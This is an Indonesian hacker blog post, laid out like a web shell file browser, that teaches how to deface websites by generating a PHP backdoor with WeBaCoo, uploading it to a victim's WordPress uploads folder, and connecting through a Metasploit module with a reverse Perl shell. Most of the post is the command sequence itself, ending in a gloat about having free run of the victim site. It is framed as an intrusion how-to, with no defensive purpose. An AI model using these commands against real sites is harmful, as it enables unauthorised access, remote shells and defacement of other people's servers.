BL4ZTERZT404
NOT FOUND!
Today : | at : | safemode : OFF| Security : Active
> / blazterzt404 / public_html / blog / post /

Dear sobat blogger blazterzt, blog blazterzt sudah aktif kembali silahkan cekout konten terbaru dari mas blazt.
name author perms com modified label

.:: Defacing - Membuat Backdoor dengan Webacoo dan Metaesploit BLAZTERROR rwxr-xr-x 0 5:16 PM

Filename .:: Defacing - Membuat Backdoor dengan Webacoo dan Metaesploit
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 5:16 PM
Label
Action


Dear Sobar Blogger, kali ini mas blaz mau sharing trik nih , yaitu Hack / Deface website menggunakan WeBaCoo, WeBaCoo adalah sebuah tools CLI (Command Line) yg menjadi penghubung http antara Attacker (Penyerang) dengan Web Server yang menjadi target kita, disertai dengan pembuatan Web Backdoor tools yg berbasis Perl ini juga memberikan module agar client dapat mengakses melalui metasploit.

sekarang mari kita lihat kronologinya.

Equipments:
1. WeBacoo
2. Metasploit

pada OS Kali Linux secara default webacoo bisa kita temukan di /usr/share/webacoo/

bagi yg belum ada tools ini silahkan download terlebih dahulu
# git clone https://github.com/anestisb/WeBaCoo.git
untuk lebih jelas nya silahkan lihat gambar ini sob :


selanjutnya kita memindahkan file 'msf_webacoo_module.rb' ke directory /usr/share/metasploit-framework/modules/eksploitasi/multi/http/

agar file tersebut dapat di akses menggunakan metasploit.
# cp /usr/share/webacoo/msf_webacoo_module.rb [b]/usr/share/metasploit-framework/modules/exploits/multi/http/[/b]
untuk lebih jelas lihat gambar :


selanjutnya kita cek apakah module tersebut siap di eksekusi:
# msfconsole -q
msf > search webacoo
terlihat pada gambar diatas, module webacoo siap jalankan dan sekarang tahap pembuatan Backdoor ala WeBacoo
# webacoo -g -o /tmp/webacoo.php
-g = generate backdoor
-o = output filename
/tmp/webacoo.php = saya menyimpannya di directory /tmp/ dengan nama webacoo.php

selanjutnya kita upload ke situs korban,
dan disini backdoor saya terletak di /wp-content/uploads/webacoo.php

selanjutnya kita kembali ke Metasploit untuk mengkoneksikan Client dengan WebServer target :
msf > use exploit/linux/http/msf_webacoo_module
msf exploit(msf_webacoo_module) > show payloads
msf exploit(msf_webacoo_module) > set PAYLOAD cmd/unix/reverse_perl
msf exploit(msf_webacoo_module) > set LHOST XXX.XXX.XXX
msf exploit(msf_webacoo_module) > set LPORT 4444
msf exploit(msf_webacoo_module) > set RHOST XXX.XXX.XXX.XXX or www.TARGET.com
msf exploit(msf_webacoo_module) > set URI /wp-content/uploads/webacoo.php
msf exploit(msf_webacoo_module) > check
msf exploit(msf_webacoo_module) > exploit
PAYLOAD = payload yang saya gunakan
LHOST and LPORT = IP-Address saya dan Port Listen saya
RHOST = Situs Target
URI = Letak dimana backdoor disimpan


terlihat diatas Command Shell 1 telah tebuka.
suksess.... sekarang kita bebas di situs korban
sedikit penjelasan, pada kenyataannya kita bisa langsung terhubung dengan server korban tanpa harus melalui Metasploit menggunakan perintah:
# webacoo -t -u http://www.TARGET.com/Path/Backdoor/backdoor.php
-t = Establish remote "terminal" connection
-u = Url Backdoor



avatar Author : BLAZTERROR
Posting : .:: Defacing - Membuat Backdoor dengan Webacoo dan Metaesploit
Time : 5:16 PM
Label :
Get The c0de and feel your soul ~ Indonesian c0ders

Baca Juga yang ini :



0 comments:

 

BL4ZTERZT404_ © 2013 BL4ZTERZT404 Blogs All Right Reserved
Thx To B374K and p4r4ghcyb3rn3t, Template Redesign by BL4ZTERZT404 - Blogs

Find Our Facebook!
Join Indonesia Blog Community!